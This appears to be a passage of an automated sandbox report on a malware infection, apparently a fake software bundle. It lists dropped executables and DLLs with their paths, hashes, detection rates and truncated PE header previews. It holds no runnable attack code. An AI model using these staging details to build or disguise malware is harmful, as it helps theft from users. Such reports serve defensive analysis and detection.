. . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA89C.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	92054
Entropy (8bit):	3.039533407746887
Encrypted:	false
SSDEEP:	1536:sOT1enbY7fwpTFFCcKloJyjA6n1G5UE96yvQOxhPZU0IPThtLUooa+Yo09+a/L0:sOT1enbY7fwpTFFCcKloJyjA6n1G5UEv
MD5:	D3FB57F94B706116EF2309697531EA64
SHA1:	28C1E862EC39B9488FB03A132115A9D9C297297D
SHA-256:	08583D81A2961E2AC3B466A48C3055800A0AD9BA008A3C3C36FE8A1A63996362
SHA-512:	A98FA79A6F71A2CB6180036A79CD4325DC07D96C3FFF62CF5198A933C6103F163164DBD28AC8AACF3DF564B1EE3825C70E1C360086AD1E8C442CE5895EAAE04E
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8FA.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6940362846730896
Encrypted:	false
SSDEEP:	96:TiZYWtxh6oY2YCu4jop1HeYEZ+xqtFixMCXSwd70a3FgMqqd8IZhY:2ZD5BLMx3wa3FgMqqd7ZhY
MD5:	452571A15C0568AB3ED8A6D6BFDE378A
SHA1:	F99595501391FBBD0B8412EDD07656307FB97FD1
SHA-256:	EA659B379E4BB1DC41AF91EAF69D800DD1C4D8A92A65DE15E7D76A3F187E0B01
SHA-512:	45952560ACBFC3E8736C1C50734E9CA4EE8BA8FB27693BBC30845543E3B83EA7D82DFAF722EDFAA5DFB87754F67656AA062B1EE3582D00198599C1C7A32BABE8
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB61B.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90956
Entropy (8bit):	3.0393198012263274
Encrypted:	false
SSDEEP:	1536:Iwl6gkTfYNWArGC18ZBqCBklohy0l6n1G5UE96yvQOxhPZU0QPme+I/OQ09zq4:Iwl6gkTfYNWArGC18ZBqCBklohy0l6nA
MD5:	4ED1048368F1921C2D729886D46B9B72
SHA1:	61D72A5E31A371D7B81003FE87031F764D93070A
SHA-256:	2A71A2F79E210A32FA2A994D65D0CB9A178BD66B980BF928D686D4703BB8991C
SHA-512:	7E7B04E7882B3850BFECDE2631DC2E72819B8D5BB02564FCB76D13180F2E2D8D3CB36B9CB6CB35A8380850781C1E948B96C8F610212EDD229CAAB20062A41252
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB7F1.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.694713366364874
Encrypted:	false
SSDEEP:	96:TiZYWlPclbJhYaYU4F/H2YEZVOXtFiPMeXbw8apXaNFCMQqjIJhY:2ZDod0oSaNFCMQqsJhY
MD5:	7F61C9055A1E26B5C82351B65BDB9485
SHA1:	E5356289772FB1C9148D408FA062EF3F226A7EA7
SHA-256:	E94D64E04A1A3FFDE4EDBC138C7498902BACA413EDD34F647E6EA1732BD7FBEB
SHA-512:	191A9BAC8227055D0EBB9A31DC404C861BF4961D3C64D7C1608A05DCF24794CDDF2E0F36B5E2E7054DCEC2CBCC3EFDFAA097E7FCA1BFCDB9D4BB87BB78CEF41E
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\WinTrackerSP\WinTrackerSP.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3828752
Entropy (8bit):	7.950185500817205
Encrypted:	false
SSDEEP:	98304:rm3o0QMznQ6mUOAj4H0KikjBY5fgq/crZN:GmMzQ6eAj4HbjBOIkS
MD5:	2AB891D9C6B24C5462E32A0BAB3D1FEC
SHA1:	4DBB387D2FCE2B47FF3699468590466505BA7554
SHA-256:	6FFD157EB781504EADD72996C2CDBD4881034FFB7F7D2BC4B96D4DAA61FB4D86
SHA-512:	0317A30E9E70D0AC8416F14A91119504FC40E9A72EE34D358741EBF820367ABB3B18E2C64987F6D86D3C4A8952621AEBECA83FA027D66EDB456C749E56D42D89
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Joe Sandbox View:	Filename: 1719520929.094843_setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........&...u...u...u...t...u...t%..u%C.u...u%C.t...u%C.t...u%C.t...u...t...u...t...u...t...u...u}..u.@.t...u.@.u...u.@.t...uRich...u........................PE..L...r*~f...............'.....j......X h...........@.................................z:...@......................................................................................................................................................... {........................... ..` .r..........................@..@ .&...p......................@... ............................@..@ .A...0...0..................@..B.idata..............................@....tls.....................................rsrc...............................@..@.themida..W.........................`....boot.....0.. h...0.................`..`.reloc...............l:................@................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: jlO7971vUz.exe, Detection: malicious, Browse Filename: Rnteb46TuM.exe, Detection: malicious, Browse Filename: 1jPL5zru3u.exe, Detection: malicious, Browse Filename: Zachv5lCuu.exe, Detection: malicious, Browse Filename: 1719520929.094843_setup.exe, Detection: malicious, Browse Filename: j7iUba2bki.exe, Detection: malicious, Browse Filename: 9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe, Detection: malicious, Browse Filename: 1Cvd8TyYPm.exe, Detection: malicious, Browse Filename: ukuWaeRgPR.exe, Detection: malicious, Browse Filename: 8Scta2jVt5.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10564608
Entropy (8bit):	7.969573483347947
Encrypted:	false
SSDEEP:	196608:7PyWqZApuYuBDhM7GsHkE5j5hKAbsZ2i0zdKRVZ6FspAE5EFH73AUYR:7aWNRuBDZsEChnK2VziVZdu3h8
MD5:	3B24971C5FEF776DB7DF10A769F0857A
SHA1:	AB314DDF208EF3E8D06F2F5E96F0F481075DE0F4
SHA-256:	0D990BEDAC4696A67AD46DBC686750086F72F4795ED8A6121782BA3B0DC736B5
SHA-512:	F70DCCD6FD95516EAC21B0CC30C70FB5F17C3C8F1F3B28FE3BDAEC6053C2DE53DAF68CAF422DEA8861E4AB84F3DD7BE36965C6998C1380DBF2A05A2A74B36B28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....2pf..........#.................:..........@.......................................... ...................................................\|.<............M..`*...........................................M}.(....K..8............@.. ............................text...v~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...a%......................... ..`.text1..X....@......................@....text2..`'...P...(..................`..h.rsrc...............................@..@........................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3828752
Entropy (8bit):	7.950185500817205
Encrypted:	false
SSDEEP:	98304:rm3o0QMznQ6mUOAj4H0KikjBY5fgq/crZN:GmMzQ6eAj4HbjBOIkS
MD5:	2AB891D9C6B24C5462E32A0BAB3D1FEC
SHA1:	4DBB387D2FCE2B47FF3699468590466505BA7554
SHA-256:	6FFD157EB781504EADD72996C2CDBD4881034FFB7F7D2BC4B96D4DAA61FB4D86
SHA-512:	0317A30E9E70D0AC8416F14A91119504FC40E9A72EE34D358741EBF820367ABB3B18E2C64987F6D86D3C4A8952621AEBECA83FA027D66EDB456C749E56D42D89
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........&...u...u...u...t...u...t%..u%C.u...u%C.t...u%C.t...u%C.t...u...t...u...t...u...t...u...u}..u.@.t...u.@.u...u.@.t...uRich...u........................PE..L...r*~f...............'.....j......X h...........@.................................z:...@......................................................................................................................................................... {........................... ..` .r..........................@..@ .&...p......................@... ............................@..@ .A...0...0..................@..B.idata..............................@....tls.....................................rsrc...............................@..@.themida..W.........................`....boot.....0.. h...0.................`..`.reloc...............l:................@................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5OpenGL.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	320120
Entropy (8bit):	6.398399631689542
Encrypted:	false
SSDEEP:	6144:bSU6+JAfisltPzYzrIybvaEezwMckNI+STEDv4nk3ad04ZqhKTrg+COv:brAltbYzsOvaWJ
MD5:	DB19F6E0A1BB5DB1C8D87C3FE0891136
SHA1:	3B2DAB478A8268000EF5E4474D52CB71F9EB615E
SHA-256:	7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
SHA-512:	B328DC6D1ADE3061894BC5C50F437B732190DE3CEA6D2CDC147A9A8193EE73221937FBA24209B66226D5E4B05DFFF5A79DB8B134373D1218605BCBA6EE82A6B3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@hB:!..:!..:!..3Y..2!...L..8!..aI..8!...L..,!...L..2!...L..9!...O..=!..:!..."...O../!...O..;!...O..;!..:!..;!...O..;!..Rich:!..........................PE..d....lP_.........." .....\...v......$_...................................................`..........................................5...........................,......x.......\|...P...T.......................(....................p..p............................text....[.......\.................. ..`.rdata..."...p...$...`..............@..@.data...8...........................@....pdata...,..........................@..@.rsrc...............................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Svg.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	331384
Entropy (8bit):	6.387255143196498
Encrypted:	false
SSDEEP:	6144:cOjmvCPMfXfCsXL0hq+SNcFxkqSj1ZBtp:fcC05tp
MD5:	C3424F2D3D26632C341EF2F542AEA36B
SHA1:	30640EBFF046085DBA3BD0877DE8A90886BED945
SHA-256:	FB0BD60A7D0178C62CFD14D53B40AD47E8F68DB68B95C625723CADC1CD3A1A3E
SHA-512:	72D9A32433DA38CFB752A67C5F903F3480871FCBD16DC5999FB970313079652CF7AEB481DA6097879B641A0E76271118C6E82406DD14C9C90C7460BA6A71BDC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........O...........8...................................W............W.....W.....W.T.....<....W.....Rich...........................PE..d...z.P_.........." .........................................................@....../.....`..................................................*....... ...........1......x....0..8....N..T...................XP..(...PO...............................................text............................... ..`.rdata.............................@..@.data...............................@....pdata...1.......2..................@..@.rsrc........ ......................@..@.reloc..8....0......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5WinExtras.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	469624
Entropy (8bit):	6.027128925039679
Encrypted:	false
SSDEEP:	6144:g814pr+wMrppkALmug7u7ozC/B4OvCH9UYHeAeBC:u9+wAkAS2j/B4BryC
MD5:	820FFF478DC5F2C2D5F03A5DB9187FBC
SHA1:	BD58AA8596345C837E1743617452EC7D73013F3A
SHA-256:	3DC976E86D64881E0F37A54B5A04E903235E94D858889B1261527F0048CFBC03
SHA-512:	1476919C5C133ACA519B9E9BE2684A85C7E669FA43942204ACDD9EC4A40577F966AD17D30A7EBD3A97A871E71178F0058966410A934822B96F0B2D7120AA43CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m>W.)_9.)_9.)_9. '../_9..28.+_9..2<.?_9..2=.!_9..2:.*_9.r7=.(_9.r78.%_9..18.,_9.)_8.._9..1<.&_9..19.(_9..1.(_9.)_..(_9..1;.(_9.Rich)_9.........PE..d...G.P_.........." .................................................................[....`.........................................0d...:...................p...K......x.......h....B..T...................8D..(...0C...............0...............................text...t........................... ..`.rdata.......0....... ..............@..@.data..............................@....pdata...K...p...L..................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Xml.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	213112
Entropy (8bit):	6.331143352918189
Encrypted:	false
SSDEEP:	3072:V7rtKxzN2HVkkNUq3uUw8SWrBEcsGhLec956+48G+ikgyOzk1kLrTzhvt3GyY:Vr2N253eUw81rBXVevrH+mk12rTlS
MD5:	63D91B407A350DA5CE19B5D79924B1F4
SHA1:	45886A4018B60A5EAB7D4B743F4DF2A9A4318EDC
SHA-256:	22B626313A535C85CE6A097571C53A6E6678A9D4BC5D0DB9F81660ADC7ED366E
SHA-512:	FA06AB2B1AE116BC7AE93EA64D4C258A7149A23C0171C077F0919956101A22A59DD8E3F975C64073319842F01D6183253F637A0EDB514F0C02C9D88B0E65E6CF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
